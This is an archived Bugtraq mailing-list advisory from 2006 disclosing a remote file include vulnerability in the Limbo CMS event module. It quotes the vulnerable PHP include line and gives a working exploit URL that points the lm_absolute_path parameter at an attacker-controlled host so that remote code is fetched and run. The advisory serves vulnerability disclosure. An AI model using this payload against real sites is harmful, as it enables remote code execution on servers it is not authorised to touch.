[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities
From: xorontr@xxxxxxxxx
Date: 28 Dec 2006 05:23:25 -0000

-----------------------------------------------

Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities

-----------------------------------------------


Author: xoron

-----------------------------------------------
 
Vuln Code:

include_once($lm_absolute_path."components/com_event/lang/event.".$lm_language.".php");

-----------------------------------------------

3xplo!t:

http://www.[target].com/[script_path]/eventcal/mod_eventcal.php?lm_absolute_path=http://evil_scripts?


-----------------------------------------------

download:  http://www.limbo-tr.com/images/downloads/event.zip

-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlarin kurban bayrami simdiden mubarek olsun -
-                                                         -
-              Greetz: str0ke, Kacper                     -
-                                                         -
-----------------------------------------------------------

# milw0rm.com [2006-12-27]

Prev by Date: [SECURITY] [DSA 1242-1] New elog packages fix arbitrary code execution
Next by Date: [SECURITY] [DSA 1243-1] New evince packages fix arbitrary code execution
Previous by thread: [SECURITY] [DSA 1242-1] New elog packages fix arbitrary code execution
Next by thread: [SECURITY] [DSA 1243-1] New evince packages fix arbitrary code execution
Index(es):
- Date
- Thread